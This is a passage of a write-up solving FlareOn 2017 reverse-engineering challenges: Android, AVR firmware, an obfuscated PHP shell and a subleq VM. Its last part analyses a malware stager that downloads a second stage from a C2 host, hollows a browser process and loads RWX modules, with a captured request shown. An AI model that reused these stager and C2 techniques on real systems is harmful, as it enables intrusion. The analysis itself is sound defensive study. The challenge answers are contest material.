if (memcpy(pkt->Magic_of_Module, magic_array_of_0x10_bytes, 0x10)==0){ data = malloc( pkg->DataSize2 ); /* process(pkt) */ }
Which appears to be the function called when a packet is received, and that the “magic” field matched to the DLL. Symetrically, another function could be found, but this one to build a response packet from this module. Reversing all those modules could be summarized in the table below:
3 types of plugin actions can be found (as detailed by 0x04025DF):
CMD: send and receive command to the client (get OS information, execute command in terminal, etc.)
CRPT: cryptographic operation
COMP: compression operation
And here is where the header field
DataSize2 (at header+0x10) comes in handy:
actions triggered by crypto or compression modules can produce an output whose
length is different from the original
header.DataSize. So the field
DataSize2 indicates the size of the output after the cryptographic or
compression operation has been done. Although some crypto operations were used, the key (and IV when needed) could
always be found in the message header.
Chaining modules together allows to create some pretty complex
output (for example
Base64( zlib_deflate( XTEA(data) ) ) ), that would be
absolutely impossible to reverse correctly, solely with the static analysis of
the PCAP file. So if we want to reconstruct the data, we must write a parser at some point to
parse the data of the PCAP (the final version of the parser can be found here).
Reconstructing the screen capture
m.dll captures the desktop as a bitmap and send the raw data back to the C2
(uses the same function as
the
MSDN example). But
because it is a pure bitmap, there is no information of the dimensions of the
image. In addition, the image is split in several packets, some of them are sent
in plaintext, like this
00010A26 32 30 31 37 49 d8 69 59 24 00 00 00 4c 40 00 00 2017I.iY $...L@.. 00010A36 4c 40 00 00 51 29 8f 74 16 67 d7 ed 29 41 95 01 L@..Q).t .g..)A.. 00010A46 06 f5 05 45 1c 00 00 00 30 40 00 00 30 40 00 00 ...E.... 0@..0@.. 00010A56 f3 71 26 ad 88 a5 61 7e af 06 00 0d 42 4c 5a 21 .q&...a~ ....BLZ! 00010A66 17 04 17 20 03 00 00 00 51 00 00 00 00 00 00 00 ... .... Q....... 00010A76 00 00 00 00 a3 ae cc a1 cb 4f aa 7a 9a 59 4d 13 ........ .O.z.YM. 00010A86 8a 1b fb d5 00 00 01 00 38 d1 0f 00 00 40 00 00 ........ 8....@.. 00010A96 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ........ ........ 00010AA6 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ........ ........ 00010AB6 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ........ ........ [...]
Whereas others are compressed and/or encrypted by the different algorithms mentioned above. However, they are all sent sequentially. Once all the fragments extracted by the parser, they were merged into a raw file. Thanks to a good tip by alex_k_polyakov , I used the website RawPixels.net, and when setting a resolution of 1420x720, the following capture showed up:
After all those efforts, finally a good lead on the challenge to find.
More Loadable Modules !!
Continuing the replay of packets showed something very interesting:
secondstage.exe was sending commands to a child process
cmd.exe, attempting
to reach a host whose NetBIOS name is
larryjohnson-pc, and if found, would run
drop 2 files in
C:\staging,
pse.exe and
srv2.exe. Finally it would execute
the command:
pse.exe \\larryjohnson-pc -i -c -f -d -u larry.johnson -p n3v3rgunnag1veUup -accepteula srv2.exe
pse.exe is nothing more
than
SysInternals PsExec,
so the command would push and execute
srv2.exe as the user
larry.johnson. If
all went well,
secondstage.exe then attempts to load a new Loadable Module,
p.dll, whose magic is 77D6CE92347337AEB14510807EE9D7BE. This DLL will be used
to proxy the packets from/to the C2 directly to
srv2.exe via
secondstage.exe. In
addition, the C2 then sends a few new Loadable Modules to the running
srv2.exe
process:
Smart parsing of the PCAP
It is altogether 15 Loadable Modules that are needed to be implemented for decompression or decryption. In some cases, the implementation of the algorithm was not standard (for example RC4), so I had to rewrite from scratch according to the reversed DLL solely. Particularly the ApLib module was a pain to use properly.
But it was critical that our implementation strictly stick to the one from the module. So a lot (a LOOOOOT) of testing was required all the time, as even a one byte mistake could make the content of a packet unreadable for the upper layer, leading to not be able to decrypt files later on…
But after some long hours perfecting the decrypting script, the result pays off directly, and all traffic is now in plaintext, revealing some crispy information:
2 new files can be found from the extract:
cf.exea C# compiled file
- a 561972 byte file beginning with the pattern
cryp
cf.exe doesn’t show much mystery: it takes 2 parameters, a path to file, and a
base64 encoded key. And it will AES encrypt the file with the given key.
As seen in the capture above, we were capable of decrypting the packet that holds the command used for encrypting the file.
c:\staging\cf.exe lab10.zip tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=
So we can build a decryptor in few lines of Python
import base64, sys, hashlib, struct from Crypto import Random from Crypto.Cipher import AES BLOCK_SIZE = 32 def p32(x): return struct.pack("<I",x) def u32(x): return struct.unpack("<I",x)[0] def decrypt(encrypted, passphrase, iv): aes = AES.new(passphrase, AES.MODE_CBC, iv) return aes.decrypt(encrypted) if __name__ == "__main__": data = open(sys.argv[1]).read() print("[+] data_size = 0x%x" % len(data)) key = base64.b64decode("tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=") i = data.find("cryp") i += 4 iv = data[i:i+0x10] print("[+] iv: %s" % iv.encode('hex')) i += 0x10 sha = data[i:i+0x20] print("[+] sha: %s" % sha.encode('hex')) i += 0x20 enc = data[i:] dec = decrypt(enc, key, iv) sz = u32(dec[:4]) filename = dec[4:4+sz] filesize = u32(dec[4+sz:4+sz+4]) print("[+] filepath '%s'" % filename) print("[+] filesize 0x%x" % filesize) i = 4+sz+8 decrypted_file_content = dec[i:i+filesize] print("[+] len(decrypted) 0x%x, writing 'lab10.zip'..." % len(decrypted_file_content)) open("lab10.zip", "wb").write(decrypted_file_content)
$ python uf.py crypfile [+] data_size = 0x89334 [+] iv: fec85f816b82806996fc991b5731d2e1 [+] sha: 797c33964e0ed15a727d4175c2bff5a637da6587229cce9bd12d6a13cf8596db [+] filepath 'c:\work\flareon2017\package\lab10.zip' [+] filesize 0x892c6 [+] len(decrypted) 0x892c6, , writing 'lab10.zip'...
We’ve got the real challenge!
And to conclude, unzip
lab10.zip with the password from the screenshot:
infectedinfectedinfectedinfectedinfected919. This will drop a file in
GoChallenge/build/challenge10, which is a Go challenge in ELF. But when we
execute it, we see a well deserve reward:
root@kali2:/ctf/flareon_2017/12 # ./GoChallenge/build/challenge10 hello world The answer is: 'n3v3r_gunna_l3t_you_down_1987_4_ever@flare-on.com'
Conclusion
Thank you to FireEye for those fun challenges… and congratulations to all the winners (especially those who managed to finish in under a week, massive props)!! I hope those writeups don’t make those challenges look trivial, they weren’t (only ~130 over more than a thousand participants completed the 12 challenges). IMHO, some challenges (like the end of challenge 4 or 10) involved too much guessing, which can be very (VERY) frustrating.
But all in all, it was a fun experience… And thank you for whomever prepared challenge 12, it was huge in all the possible meanings, and it must certainly have required a serious patience to build!
And final thanks to alex_k_polyakov , n4x0r31 and aymansagy .
See you next year for Flare-On 5!
Share this post:
|
https://blahcat.github.io/2017/10/13/flareon-4-writeups/
|
CC-MAIN-2018-22
|
refinedweb
| 8,053
| 63.39
|
On Tue, 8 Jan 2008 06:36:41 -0800 (PST), Vincent M wrote:
> Hi,
>
> ?
I have humor/fyi email list where I send jpg, gif,,,, things I find on
the net. If I see something I'll click up a terminal and use import.
import where/2/store/fn_here.type
Example:
import ehumor/jpg/cat.jpg
Then press button, drag mouse, release button and selection will be
stored in $HOME/ehumor/jpg/cat.jpg
If I change cat.jpg to cat.gif, format will be .gif.
This will not work for pdfs.
cron job pulls all files and emails them to everyone on the list.
|
http://fixunix.com/mandriva/323383-easy-downloading-while-surfing-no-right-click-save.html
|
CC-MAIN-2015-27
|
refinedweb
| 105
| 87.92
|
Opened 3 years ago
Closed 2 years ago
Last modified 2 years ago
#10427 closed enhancement (fixed)
trac.log: dead code - logger_factory()
Description
This code is not referenced from anywhere. It is dead and can be removed - source:/branches/0.12-stable/trac/log.py@10847:67-70#L64
Attachments (0)
Change History (12)
comment:1 follow-up: ↓ 3 Changed 3 years ago by
comment:2 Changed 3 years ago by
- Milestone changed from 0.12.3 to 0.13
- Type changed from defect to enhancement
(And enhancements go to 0.13.)
comment:3 in reply to: ↑ 1 ; follow-up: ↓ 4 Changed 3 years ago by
comment:4 in reply to: ↑ 3 Changed 3 years ago by
comment:5 Changed 3 years ago by
BTW, I'm not making that number up…
$> svn ls | wc -l 782
And I know plenty of other plugins (including some of mine) that are not published on Trac-Hacks.
Anyway, it was all just meant as a pointer to the fact that there is a lot of legacy code out there that depend on Trac internals… The dead code is likely a left-over of some deprecated call-behaviour, and I cannot see that any of those plugins will still be working with recent Trac versions anyway - not with the current eagerness to break APIs and move things around to suit Trac internals… ;-)
comment:6 Changed 3 years ago by
I wonder if we couldn't add a
trac/compat.py module where we could easily move all the old code… something like:
from trac import log def logger_factory(logtype='syslog', logfile=None, level='WARNING', logid='Trac', format=None): return log.logger_handler_factory(logtype, logfile, level, logid, format)[0] log.logger_factory = logger_factory
That way, people could get a cheap way to keep their plugin working, and it would also serve as a way to document what has changed for those who want to adapt their code. That would help to keep the rest of the codebase clean, yet give a safety net for plugins. Of course, this will only work to compensate for removed functions or methods, not for signature changes, but that would still be something.
comment:7 Changed 3 years ago by
- Cc osimons added
We already have
trac.util.compat, but in this case it makes more sense just to remove the code. There is no actual behavior change or code removal, it is just another way calling the same code. If you need to update to import from other module, it should not require much more effort just to change your call syntax instead.
+1 for removing in trunk, no compat.
comment:8 Changed 2 years ago by
- Owner set to rblank
comment:9 Changed 2 years ago by
- Resolution set to fixed
- Status changed from new to closed
comment:10 Changed 2 years ago by
- Owner changed from rblank to anatoly techtonik <techtonik@…>
comment:11 Changed 2 years ago by
- Cc ryano@… added
Right about now Simon should jump out of nowhere and claim that ~800 plugins rely on that function ;)
|
http://trac.edgewall.org/ticket/10427
|
CC-MAIN-2014-42
|
refinedweb
| 511
| 63.63
|
C# Tip: Monitoring Clipboard Activity in C#
Welcome to this week's installment of .NET Tips & Techniques! Each week, award-winning Architect and Lead Programmer Tom Archer demonstrates how to perform a practical .NET programming task using either C# or Managed C++ Extensions.
My MFC book Visual C++ .NET Bible includes a chapter on working with the Windows Clipboard from Visual C++. Quite a number of readers have asked about how to perform similar tasks in C#. One of those tasks—which the "Clipboard ring" in Microsoft Office has made popular—is specifying that your application is notified if the Clipboard changes. This week's installment of .NET Tips & Techniques provides both an overview and a step-by-step example for accomplishing this with .NET and C#. That way, if you're already familiar with how the Clipboard works (or you're in a hurry) and just want to jump directly to the code, you can.
Figure 1: Example of Monitoring the Windows Clipboard for Any RTF or ASCII Text
Overview
Windows maintains a list, or chain, of windows that have requested to be notified when data on the Clipboard has been modified. Each time the Clipboard data is modified, the first window in this chain receives a message—WM_DRAWCLIPBOARD. The window then can query the Clipboard as to the type of data it contains (such as RTF, ASCII text, and so on) and the actual data. Because there is no managed (.NET) API for adding a window to this notification chain, you have to use the Win32 SetClipboardViewer function. While this is a fairly simple process, you should be aware of some general guidelines when using this function:
- When calling the SetClipboardViewer function, you need to pass the handle of the window that will receive the WM_DRAWCLIPBOARD message. The SetClipboardViewer function returns the current first window in the chain. Your application should store this value—typically in a class member—because each window that receives the WM_DRAWCLIPBOARD message has to send that same message to the next window in the chain (via the SendMessage function).
- Handle the WM_DRAWCLIPBOARD message. This can be done by providing a Form class overload of the WndProc method. You'll see an example of doing this shortly.
- Handle WM_CHANGECBCHAIN message. Because each window that handles the WM_DRAWCLIPBOARD message is responsible for sending that message to the next window in the chain, it must also know when the chain changes. The Clipboard sends the WM_CHANGECBCHAIN message when a window has removed itself from the chain.
- Remove the window from the chain when finished. This task is accomplished via the Win32 ChangeClipboardChain function, and it can be done any time that Clipboard monitoring is no longer needed.
Step-by-step Instructions
- As mentioned in the Overview, you'll need to call several Win32 functions—SetClipboardViewer, ChangeClipboardChain, and SendMessage—in your application. In order to do that from a .NET application, you first have to import those functions by using the DllImport attribute (which resides in the System.Runtime.InteropServices namespace). The following example imports these functions within the demo application's Form class:
- Define a class member to hold the current first window in the Clipboard notification chain:
- Call the SetClipboardViewer function. In the demo, I call this function in the form's constructor:
- Within the Form class, override the WndProc method. As you can see here, I handle only two messages: WM_DRAWCLIPBOARD and WM_CHANGECBCHAIN. Note that I define two constants for these messages (where both values can be found in the Platform SDK's winuser.h file.)
In the WM_DRAWCLIPBOARD message-handling code, I call a helper function to display the text that is currently on the Clipboard and pass the same message on to the next window in the chain. (You can see the code to display RTF and ASCII text in the article's demo code at the end of this column.)
In the WM_CHANGECBCHAIN message-handling code, I check to see whether the window being removed from the Clipboard chain (passed in the Message.WParam member) is the next window in the chain. If it is, I then set the form's next window member variable (nextClipboardViewer) to the next window in the chain (passed in the Message.LParam member):
protected override void WndProc(ref System.Windows.Forms.Message m) { // defined in winuser.h const int WM_DRAWCLIPBOARD = 0x308; const int WM_CHANGECBCHAIN = 0x030D; switch(m.Msg) { case WM_DRAWCLIPBOARD: DisplayClipboardData(); SendMessage(nextClipboardViewer, m.Msg, m.WParam, m.LParam); break; case WM_CHANGECBCHAIN: if (m.WParam == nextClipboardViewer) nextClipboardViewer = m.LParam; else SendMessage(nextClipboardViewer, m.Msg, m.WParam, m.LParam); break; default: base.WndProc(ref m); break; } }
- Finally, I remove the window from the Clipboard chain when the window class's Dispose method is called by the .NET runtime:
using System.Runtime.InteropServices; ... public class Form1 : System.Windows.Forms.Form { [DllImport("User32.dll")] protected static extern int SetClipboardViewer(int hWndNewViewer); [DllImport("User32.dll", CharSet=CharSet.Auto)] public static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int SendMessage(IntPtr hwnd, int wMsg, IntPtr wParam, IntPtr lParam); ...
public class Form1 : System.Windows.Forms.Form { ... IntPtr nextClipboardViewer;
public Form1() { InitializeComponent(); nextClipboardViewer = (IntPtr)SetClipboardViewer((int) this.Handle); ..
protected override void Dispose( bool disposing ) { ChangeClipboardChain(this.Handle, nextClipboardViewer); ...
A Chain Is Only As Strong...
After following these few steps, your application will be notified of any changes to the text on the Clipboard. Like a lot of tasks in Windows development, it's not very difficult once you know the right APIs to call. The key issue with working with the Clipboard is to make sure that you follow a few simple rules so that other applications in the Clipboard chain continue to perform correctly.<<
|
http://www.developer.com/net/csharp/article.php/3359891/C-Tip-Monitoring-Clipboard-Activity-in-C.htm
|
CC-MAIN-2014-41
|
refinedweb
| 952
| 56.96
|
table of contents
other versions
- buster 241-7~deb10u4
- buster-backports 246.6-2~bpo10+1
- testing 246.6-4
- unstable 247.1-2
- experimental 247.1-1
NAME¶sd_bus_message_append_strv - Attach an array of strings to a message
SYNOPSIS¶
#include <systemd/sd-bus.h>
int sd_bus_message_append_strv(sd_bus_message *m, char **l);
DESCRIPTION¶The sd_bus_message_append() function can be used to append an array of strings to message m. The parameter l shall point to a NULL-terminated array of pointers to NUL-terminated strings. Each string must satisfy the same constraints as described for the "s" type in sd_bus_message_append_basic(3).
The memory pointed at by p and the contents of the strings themselves are copied into the memory area containing the message and may be changed after this call. Note that the signature of l parameter is to be treated as const char *const *, and the contents will not be modified.
RETURN VALUE libsystemd pkg-config(1) file.
SEE ALSO¶systemd(1), sd-bus(3), sd_bus_message_append(3), sd_bus_message_append_array(3), The D-Bus specification[1]
NOTES¶
- 1.
- The D-Bus specification
|
https://manpages.debian.org/experimental/libsystemd-dev/sd_bus_message_append_strv.3.en.html
|
CC-MAIN-2021-04
|
refinedweb
| 178
| 51.65
|
Important: Please read the Qt Code of Conduct -
Simple project new Widget-Setting layout via code
Hi all
i'm wondering how to set a QVBoxLayout to a pre-generated Widget:
// header #ifndef FINANZE_H #define FINANZE_H #include <QWidget> #include <QtWidgets> namespace Ui { class Finanze; } class Finanze : public QWidget { Q_OBJECT public: explicit Finanze(QWidget *parent = 0); ~Finanze(); private: Ui::Finanze *ui; }; #endif // FINANZE_H
// cpp #include "finanze.h" #include "ui_finanze.h" Finanze::Finanze(QWidget *parent) : QWidget(parent), ui(new Ui::Finanze) { ui->setupUi(this); QPushButton *btn1 **= new QPushButton; QVBoxLayout *layout = new QVBoxLayout; layout->addWidget(btn1); Finanze.setLayout(layout); // Why i can't do something like that? }``` Finanze::~Finanze() { delete ui; }
Finanze.setLayout(layout); // Why i can't do something like that?
You can, unless there already is a layout set, which is highly likely if you have a .ui file. The layout was probably set in the designed and the
setupUi(this)is applying what you set in the designer. You can't have two layouts set on the same widget.
If you want to create the UI manually from code (as you seem to) then you don't need the .ui file and all the related code.
The finanze.ui haven't any layout at project start, he give me an error when i try to do Finanze.setLayout(layout)
error: expected unqualified-id before '.' token
Finanze.setLayout(layout);
^
Isn't finanze a widget?
Ah, sorry, got off track.
Finanze is a class name. You can't call a method on a class name in c++.
Either just call
setLayout(layout)(which will implicitly resolve the call for the current instance), or, if you want to be very explicit, call
this->setLayout(layout), although there's litle value in that.
Btw. If there's no layout set in that .ui file then why do you need it at all?
So if i write in the cpp of a class, i declare the STANDARD thing that class contain? Everytime i create a new "class finance" , if i setted a layout with button, they will show me the same layout.
But i can still operate in this created class in the main, right? Example i create an istance of Finance class called "Hello", if i want to set a new layout to "Hello" or add a new button, i can do that? Even if Finance class already have a layout?
Like u saw, i'm just coding for learning, but almost every 2 line of code i have to stop because can't find what i'm wrong or what i have to do!
So basically i roam through the web searching for a solution, if i can't find then i try to post it here :D
I have the ui file just because i've created it not on purpose, just did something wrong following a tutorial...
i saw that u're so present on this board, so ill try to get the best from you :D, i had another problem yesterday, following a tutorial to create a notepad:
#ifndef NOTEPAD_H #define NOTEPAD_H #include <QApplication> #include <QtWidgets> #include <QWidget> class Notepad : public QWidget { Q_OBJECT public: explicit Notepad(QWidget *parent = 0); ~Notepad(); private slots: void quit(); private: QTextEdit *textEdit; QPushButton *btnQuit; }; #endif // NOTEPAD_H
and this is the cpp
#include "notepad.h" Notepad::Notepad(QWidget *parent) : QWidget(parent) { textEdit = new QTextEdit; btnQuit = new QPushButton(tr("esci")); connect(btnQuit,SIGNAL(clicked(bool)),this,SLOT(quit())); QVBoxLayout *layout = new QVBoxLayout; layout->addWidget(textEdit); layout->addWidget(btnQuit); setLayout(layout); setWindowTitle(tr("Notepad")); } Notepad::~Notepad() { }
But when i try to build it, he say to me that there is an undefined reference to `Notepad::quit()'
Why?
So if i write in the cpp of a class, i declare the STANDARD thing that class contain? Everytime i create a new "class finance"
You don't declare any standard things. You should familiarize yourself with the following c++ concepts: class, class declaration, class definition and class instance. These are different concepts and you seem to struggle with figuring out what is what.
In short - in a header you declare a class (i.e. describe what it can do). In .cpp you define that class (i.e. describe how it does that by giving a body to the methods and variables declared in the header). In other files (for example in main.cpp) you instantiate a class, i.e. create an object that is described by the declaration in the header and behaves as defined in the cpp. The constructor (
Finanze::Finanze(QWidget *parent)) of a class describes what happens when you create an instance of it. Inside methods of an object (constructor is a method too) you refer to the instance of it (
this) and not to the name of the class. So you don't set a layout on a class (
Finanze.setLayout). You set it on an instance of a class (
this->setLayout).
For example
//Finanze.h class Finanze : public QWidget { public: Finanze(QWidget* parent = 0); }; //Finanze.cpp Finanze::Finanze(QWidget* parent) : QWidget(parent) { setLayout(new QVBoxLayout()); } //main.cpp Finanze foo ; //this is one instance of class Finanze, a constructor is called for it here Finanze bar; //this is another instance of class Finanze, , a constructor is called for it here foo.setLayout(new QHboxLayout()); // ERROR: foo already has a layout set in the constructor foo.layout()->addWidget()new QPushButton("Hi")); //but you can add something to it if you want to delete foo.layout(); //...or delete the layout. Note that it does not delete any widgets added to that layout previously
Btw. Please start new topics for new questions. It's easier for others to jump in or find it later if it's a short thread to the point, rather than finding something useful on page 13 of lengthy conversation on various topics ;) As for your question you don't define that slot quit() anywhere. You should have it in your cpp file like so
Notepad::quit() { /* do something */ }
Yes u're so right, the class concept destroyed all that i learned in VB, Pascal and C language... that's why i'm in trouble doing this thing.
Anyway U made my day!
Thanks, i will open a new topic for another question :D
|
https://forum.qt.io/topic/55276/simple-project-new-widget-setting-layout-via-code
|
CC-MAIN-2020-40
|
refinedweb
| 1,039
| 63.59
|
Mac.
For some reason the XRootD build (and I think the ROOT build is the same) doesn't find the developer headers/libraries to build SSL dependent code. With this XRootD still builds fine, but when I configure ROOT's build with:
cmake -Dall=ON -Dxrootd=ON -DXROOTD_ROOT_DIR=/usr/local/xrootd/4.2.3 -DCMAKE_INSTALL_PREFIX=/usr/local/root/v6-02-12 ../root
,
Hi Attila. I have no problem with the master on MacOSX 10.11. So, I have now to find the commit that fixes it that was not put in 6.02.
Committed a bunch of changes to fix this problem, the python RPATH treatment and CMake > 3.1 to the 6.02 patch branch.
I am assuming it is solved. Please re-open if it is not the case.
Hi Pere,
While v6-02-00-patches may be fixed for this (I didn't try. I have a quite slow laptop running El Capitan at the moment only, so I'm not compiling the head of the branch on it...), I just tried compiling v6-04-04, and that still has this issue.
I have a vanilla El Capitan installation. On which I build XRootD-4.2.3 simply with:
cmake -DCMAKE_INSTALL_PREFIX=/usr/local/xrootd/4.2.3 ../xrootd-4.2.3
Then, I try to build ROOT-v6-04-04 with:
cmake -Dall=ON -Dxrootd=ON -DXROOTD_ROOT_DIR=/usr/local/xrootd/4.2.3 -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=/usr/local/root/v6-04-04 ../root-v6-04-04/
And it fails in the way that I described before. Could you have a look? It's very annoying that I can't build ROOT with XRootD support on El Capitan at the moment.
Best,
Attila
While it doesn't add much, these are the failure messages:
[ 54%] Building CXX object net/netx/CMakeFiles/Netx.dir/src/TXNetFile.cxx.o
Scanning dependencies of target RLDAP
[ 54%] Building CXX object net/ldap/CMakeFiles/RLDAP.dir/G__LDAP.cxx.o
/Users/krasznaa/Development/ROOT/root-v6-04-04/net/netx/src/TXNetFile.cxx:64:10: fatal error:
'XpdSysPthread.h' file not found
#include "XpdSysPthread.h"
^
1 error generated.
make[2]: *** [net/netx/CMakeFiles/Netx.dir/src/TXNetFile.cxx.o] Error 1
make[1]: *** [net/netx/CMakeFiles/Netx.dir/all] Error 2
make[1]: *** Waiting for unfinished jobs....
Cheers,
Attila
Now that I'm running 10.11 on a faster machine as well, it turns out that the exact same failure happens with v6-04-04 when I try to build it with:
cmake -Dall=ON -Drpath=ON -Dunuran=OFF -Dbuiltin_xrootd=ON -DCMAKE_INSTALL_PREFIX=/usr/local/root/v6-04-04 ../root
Once again, it fails with:
/Users/krasznaa/Development/ROOT/root/net/netx/src/TXNetFile.cxx:64:10: fatal error:
Best,
Attila
ARGH! One commit available in 6.02 and master was forgotten in 6.04? And other one was done after the tagging of 6.04. If you could validate the attached patch I could re-do a path release of 6.04.
Will do once I get home. (It's my "home Mac" that runs El Capitan already, which is a bit faster.)
Cheers,
Attila
I can confirm that this patch on top of v6-04-04 makes the build succeed in my setup.
Cheers,
Attila
|
https://sft.its.cern.ch/jira/si/jira.issueviews:issue-html/ROOT-7680/ROOT-7680.html
|
CC-MAIN-2020-10
|
refinedweb
| 542
| 61.12
|
02-21-2012 11:29 AM
Hi all,
I'm having trouble including the Nationalinstruments namespace to my application (MS Visual Studio 2010 C#).
I have added the references NationalInstruments.Common and NationalInstruments.VisaNS like in the example files.
However, I get an error message during built saying:
error CS0246: The type or namespace name 'NationalInstruments' could not be found (are you missing a using directive or an assembly reference?)
What am I missing here?
Thanks,
Benjamin
Solved! Go to Solution.
02-24-2012 11:19 AM
This is a double post. Let's keep the discussion on the other thread because this is a C# .NET issue and not related to MStudio for VC++. I have posted a response to the other thread.
06-11-2012 01:30 PM
Problem was solved in the other thread.
|
http://forums.ni.com/t5/Measurement-Studio-for-VC/using-NationalInstruments-VisaNS-command-not-working/m-p/1885031
|
CC-MAIN-2013-20
|
refinedweb
| 137
| 70.29
|
:
Virtual Worksheets
A common step in working with spreadsheet data is creating intermediate tables. In a program we might use an array (which of course you still can in Resolver One), but in a spreadsheet the basic way of storing data is with cell ranges and worksheets. A cell range is just a view onto an area of a worksheet, and the disadvantage of worksheets are that they are always visible. The advatage of using spreadsheet objects rather than arrays, is that you get all the methods and properties normally available on spreadsheet objects.
One way round this problem is to directly create a worksheet without adding it to the workbook. This is a normal worksheet, but is not displayed in the grid.
from random import randint
virtual = Worksheet('Virtual')
virtual_range = CellRange(virtual.Cells.A1, virtual.Cells.A1.Offset(9, 9))
for col in range(1, 11):
for row in range(1, 11):
virtual_range[col, row] = randint(1, 10)
CopyRange(virtual_range, workbook['Sheet1'].Cells.A1)
This example creates a worksheet, with a cell range (virtual_range) covering a ten by ten block on the worksheet. This is populated with data, and then copied back into a visible worksheet using the CopyRange function.
Last edited Fri Feb 15 13:45:03 2008.
|
http://www.resolverhacks.net/virtual_worksheets.html
|
crawl-002
|
refinedweb
| 210
| 62.17
|
At 05:23 PM 4/21/2005, Branko Äibej wrote:
>This, I think, is a classic case of programmers' hubris. We should've defined apr_pid_t
&co. on all platforms, not polluted the namespace with names that APR doesn't own (and
that will clash with any Windows implementation of a POSIX-like API).
++1.
My last point about the patch to apr.hw to define FD_SETSIZE
suffers this exact same hubris.
The quicker we (open source projects, collectively) stop trying
to enforce the 'one right way' to use posix/win32 etc, the sooner
these projects will compile (collectively) with one another.
|
http://mail-archives.apache.org/mod_mbox/apr-dev/200504.mbox/%3C6.2.1.2.2.20050421173403.0781d130@pop3.rowe-clan.net%3E
|
CC-MAIN-2016-30
|
refinedweb
| 101
| 81.12
|
0
Write java program to do the following:
Write a METHOD to input an array of type LONG that stores the value
of all the powers of 2 from 0 to 63 (i.e. 2^0
to 2^63
)
Output the contents of the array screen (what happens if you try 2^64
?)
Hint: Math.pow(x,y) is used to put number x to exponent y
Program just outputs 1.0 many times which isn't right can anyone help
public class W3P3{ public static void main(String[]args){ double [] myArray = new double [63]; long myEntry=0; long Myarray=0; power(myEntry,Myarray); }//end of main //Method public static void power(long x,long y){ double results=0; for (int i = 2; i <= 63; i++) { results = Math.pow(x,y); System.out.println("The result of powers is "+ results); } }//end of method }//end of class
Edited by michelleruth
|
https://www.daniweb.com/programming/software-development/threads/448071/power-array-java-program-using-long-and-methods
|
CC-MAIN-2017-09
|
refinedweb
| 149
| 63.02
|
Proposed features/service:bicycle
Proposal
I propose to introduce
Rationale
Currently bike shops are mapped as shop=bicycle which means "A store where you can buy and/or repair your bike and buy accessories". This does not convey enough information from a cyclist's perspective.
Details
I propose to introduce the namespace service:bicycle together with the following keys. Should a new key be needed, it should be added to the table with a clear and concise description. Ideally, all key should support only yes/no values.
If a bicycle shop is not tagged with a key from the above list, it means that its status is unknown: for instance, if a bicycle shop does not have a service:bicycle:repair tag, nothing can be assumed about its repair service.
Applies to
These keys naturally apply to bicycle shops (which are mapped as shop=bicycle) but can apply to other objects as well:
- A hotel could rent bikes
- A supermarket could sell bikes
- A guest house could offer tools for diy
- etc.
Examples
A bicycle shop which sells bikes but doesn't repair them:
shop=bicycle service:bicycle:retail=yes service:bicycle:repair=no
A bicycle shop which doesn't sell bikes, but repairs them and offers a free pump:
shop=bicycle service:bicycle:retail=no service:bicycle:repair=yes service:bicycle:pump=yes
A hotel which rents bikes:
tourism=hotel service:bicycle:rental=yes
More keys
Proposed features/More service:bicycle keys contains a proposal for more keys (which are not covered by this proposal).
Alternative namespace
As discussed market: or shop: have been replaced with service:. This gives a clearer picture of what is actually available.
- Out of all the alternatives, I prefer shop:bicycle=*. I'd rather hint at Key:shop than Key:service (or indeed, Key:bicycle) as the "root" of the namespace. --achadwick 12:22, 9 June 2011 (BST)
Please use the talk page
Voting
Voting is open until 2011-05-16. Please vote with {{vote|yes}} or {{vote|no}} and sign with ~~~~
- I approve this proposal. --FedericoCozzi 22:39, 2 May 2011 (BST)
- I oppose this proposal. This tag is useless without the specialisation tags. WTF did you remove them --Extremecarver 23:51, 2 May 2011 (BST) I think a separate proposal is better: Proposed features/More service:bicycle keys --FedericoCozzi 22:35, 3 May 2011 (BST)
- I approve this proposal. although I'm agree with Extremecarver. If the only problem is about yes/no values, the tag scheme could be service:bicycle:retail:bicycle_type=* or service:bicycle:rental:bicycle_type=* (and for rent and sell, just add the two tags). --Dri60 09:30, 3 May 2011 (BST)
- I approve this proposal. I agree with Extremecarver that the specialization tags would also be nice, but I don't think the proposed tags are useless without them. I encourage Extremecarver to copy his suggested tags into a new proposal. --Dieterdreist 10:37, 3 May 2011 (BST)
- I approve this proposal. Agree with Dieterdreist - it is Ok to start with a proposal that is simple and slim, as long as the scheme is open for extensions.--Bk 10:45, 3 May 2011 (BST)
- I approve this proposal. --Burnus 11:28, 3 May 2011 (BST)
- I approve this proposal. --Ueliw0 12:16, 3 May 2011 (BST)
- I approve this proposal. --Polyglot 13:18, 3 May 2011 (BST)
- I approve this proposal. Seems useful, there is a lot of : in the tags though. Johan Jönsson 17:13, 3 May 2011 (BST)
- I approve this proposal. --Flaimo 20:11, 3 May 2011 (BST) maybe the second ":" could be replaced with a different kind of separator. suggestion: "#".
- I approve this proposal. -- Al3xius 18:31, 4 May 2011 (BST) But I hope an appropriate preset will be developed and included in JOSM asap.
- I approve this proposal. --Silviopen 15:38, 7 May 2011 (BST)
- I approve this proposal. --SteveVG 13:08, 9 May 2011 (BST)
- I approve this proposal. --DarkFlash 17:15, 9 May 2011 (BST)
- I approve this proposal. A similar scheme is already in use in some cyclist's club in Italy as a way to classify bike-friendly shops. --Emmexx 08:05, 10 May 2011 (BST)
- I approve this proposal. Kevin Steinhardt 20:12, 10 May 2011 (BST)
- I approve this proposal. EsbenDamgaard 15:46, 12 May 2011 (BST)
- I oppose this proposal. as it stands - the namespace is wrong (in my opinion) - see comments on talk page --Spark 20:15, 13 May 2011 (BST)
- I approve this proposal. --Glen 04:05, 16 May 2011 (BST)
- I oppose this proposal. There enough informations already given for cyclist's with existing tags.--R-michael 17:56, 16 May 2011 (BST)
- I oppose this proposal. Ugly, and wrong namespace. Let's use just bicycle:<whatever> on its own. --achadwick 11:07, 9 June 2011 (BST)
|
http://wiki.openstreetmap.org/wiki/Proposed_features/service:bicycle
|
crawl-003
|
refinedweb
| 804
| 64.71
|
Control Anything Remotely With Infrared Signals.
